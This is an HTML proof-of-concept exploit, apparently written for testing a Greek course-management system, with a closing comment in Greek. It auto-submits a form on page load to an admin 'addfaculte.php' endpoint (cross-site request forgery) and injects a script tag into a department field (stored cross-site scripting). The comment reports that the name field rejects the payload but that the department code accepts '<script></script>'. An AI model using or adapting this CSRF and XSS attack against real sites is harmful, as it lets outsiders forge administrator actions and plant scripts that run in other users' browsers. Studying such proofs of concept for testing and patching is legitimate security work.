<body onload='boomboom()'>
<form method="post" action="http://localhost:1180/modules/admin/addfaculte.php?a=1">

<td><input class='FormData_InputText' type='text' name='codefaculte' value='TMBomb' /></td>
<td><input class='FormData_InputText' type='text' name='faculte' value='<script>alert("Department Name");</script>' /></td>
<td><input type='submit' name='add' value='Προσθήκη' id='boom'/></td>

<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();
      }
</script>



/***********************************************************************************
Δεν δουλευει γιατι δεν μπορω να εισαγω ειδικα συμβολα στο ονομα Ιδρυματος.
Παρολαυτα μπορω να δημιουργησω νεο Ιδρυμα με κωδικο τμηματος της μορφης: <script></script>
***********************************************************************************/

